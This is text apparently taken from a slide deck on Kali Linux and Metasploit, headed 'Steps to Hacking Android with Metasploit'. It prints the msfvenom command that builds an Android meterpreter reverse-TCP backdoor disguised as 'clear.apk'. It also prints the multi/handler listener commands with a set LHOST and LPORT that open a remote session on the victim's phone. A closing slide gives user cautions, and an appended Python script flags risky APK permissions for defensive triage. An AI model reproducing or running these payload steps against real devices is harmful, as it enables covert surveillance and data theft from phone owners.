2. CONTENTS
Introduction
Kali Linux
Penetration testing
Metasploit
Introduction to Metasploit
Advantages & Disadvantages
Steps to Hacking Android with Metasploit
Payload File Creation
Sending payload To the Target
Running Metasploit and Attacker Setup
Commands to exploit victim’s Android
Future Scope
Conclusion
References
3. INTRODUCTION ON KALI LINUX
Debian-based Linux distribution aimed at advanced
Penetration Testing and Security Auditing.
Release Date: March 13th, 2013.
Security-focused version of Linux that offers a large
number of tools to seek out weaknesses and secure
your network.
Kali contains several tools
Information security tasks
Penetration Testing, Security research
Computer Forensics and Reverse Engineering
4. Developers: Mati Aharoni, Devon Kearns and
Raphael Hertzog of Offensive Security.
Open source
600 penetration testing tools + Applications
Platforms - x86, x86-64, armel
Latest Release – Kali 2017.3 – 21st November, 2017
Easy upgrade to future versions
5. Penetration Testing
Also called pentesting
Testing a computer system / network / Web application
to find vulnerabilities.
Benefits:
Intelligently manage vulnerabilities
Avoid the cost of network downtime
Meet regulatory requirements
Preserve corporate image and customer loyalty
6. MAIN TERMS
EXPLOIT - a piece of code written to take advantage of a
particular vulnerability in the system.
PAYLOAD - simple scripts that hackers utilize to interact with a
hacked system.
LHOST - The IP address you want your listener to bind to.
LPORT - The port you want your listener to bind to.
Meterpreter - advanced, dynamically extensible payload that
uses in-memory DLL injection and is extended over the network at runtime.
7. METASPLOIT
Penetration testing platform that enables you to find,
exploit, and validate vulnerabilities.
Author: Rapid7
License: BSD-3-clause
Two versions: commercial and free (Community)
edition.
Hardware requirements to install Metasploit
1 GB RAM available
1 GB+ available disk space
2 GHz+ processor
8. METASPLOIT INTERFACES
Metasploit can be used either with Console,
command prompt or with GUI.
Msfconsole – part of the Metasploit Framework,
provides an interface with all options.
Msfcli – runs directly from the command line and
puts priority on scripting.
Armitage – GUI for the Metasploit Framework.
9. Advantages
Open source
Frequently updated
Huge community
Easy to deploy user-specific exploit
Disadvantages
Difficult to learn
Can crash your system if not used wisely
Requires deep knowledge for exploit development
12. STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL
FOR CREATING THE PAYLOAD FILE
msf > msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.207 LPORT=6060 R > clear.apk
14. STEP 4: USE THE “exploit/multi/handler”
Payload Handler is a module that provides all the features of the
Metasploit payload system to exploit.
msf > use exploit/multi/handler
STEP 5: SET THE PAYLOAD
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
STEP 6: SET THE LOCAL HOST
msf exploit(multi/handler) > set LHOST 192.168.43.207
STEP 7: SET THE LOCAL PORT
msf exploit(multi/handler) > set LPORT 6060
16. STEP 8: RUN THE COMMAND “exploit”
msf exploit(multi/handler) > exploit
17. FUTURE SCOPE
Being an open source framework, it has got huge
community support.
In order to face new security challenges, Metasploit
is frequently updated for zero-day vulnerabilities.
More and more exploits will be made available to
its database for users.
Upcoming versions will be more efficient, user-friendly,
GUI-based and web-based, with customizing
options along with its interactive console.
18. CONCLUSION
The backdoor application, when installed and turned on on the
mobile, allows an attacker to read, write and modify data. Cautions:
Never permanently enable installing of apps from “Unknown
sources”.
Never take your phone to important meetings or anywhere you
don't want people listening.
Keep your Android up to date.
Install antivirus software on your Android device.
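
The cautions above amount to not installing APKs of unknown origin. As an added example (not part of the original slides), the script below triages the text output of `aapt dump permissions <apk>` and flags an app that combines network access with several sensitive capabilities. The permission list, the threshold and both sample dumps are assumptions constructed for illustration.

```python
import re

# Assumed policy for illustration: sensitive permissions and the capability each grants.
SENSITIVE = {
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.CAMERA": "camera",
    "android.permission.READ_SMS": "sms",
    "android.permission.SEND_SMS": "sms",
    "android.permission.READ_CONTACTS": "contacts",
    "android.permission.READ_CALL_LOG": "call log",
    "android.permission.ACCESS_FINE_LOCATION": "location",
    "android.permission.READ_EXTERNAL_STORAGE": "storage",
    "android.permission.WRITE_EXTERNAL_STORAGE": "storage",
}
NETWORK = "android.permission.INTERNET"
# Matches both aapt output styles: "uses-permission: name='X'" and "uses-permission: X".
PERM_RE = re.compile(r"^uses-permission(?:-sdk-\d+)?:\s*(?:name=)?'?([\w.]+)'?")

def parse_permissions(dump):
    """Return the set of permission names found in an aapt permissions dump."""
    perms = set()
    for line in dump.splitlines():
        m = PERM_RE.match(line.strip())
        if m:
            perms.add(m.group(1))
    return perms

def triage(dump, threshold=4):
    """Flag apps that pair network access with >= threshold sensitive capabilities."""
    perms = parse_permissions(dump)
    capabilities = sorted({SENSITIVE[p] for p in perms if p in SENSITIVE})
    suspicious = NETWORK in perms and len(capabilities) >= threshold
    return {"suspicious": suspicious, "capabilities": capabilities, "count": len(perms)}

# Constructed sample dumps (not taken from any real APK).
SUSPECT_DUMP = """package: com.example.cleaner
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
"""
BENIGN_DUMP = """package: com.example.scanner
uses-permission: android.permission.INTERNET
uses-permission: android.permission.CAMERA
"""

if __name__ == "__main__":
    for name, dump in (("suspect", SUSPECT_DUMP), ("benign", BENIGN_DUMP)):
        print(name, triage(dump))
```

A flagged result is a prompt for manual review, not proof of a backdoor; legitimate apps can also request broad permissions.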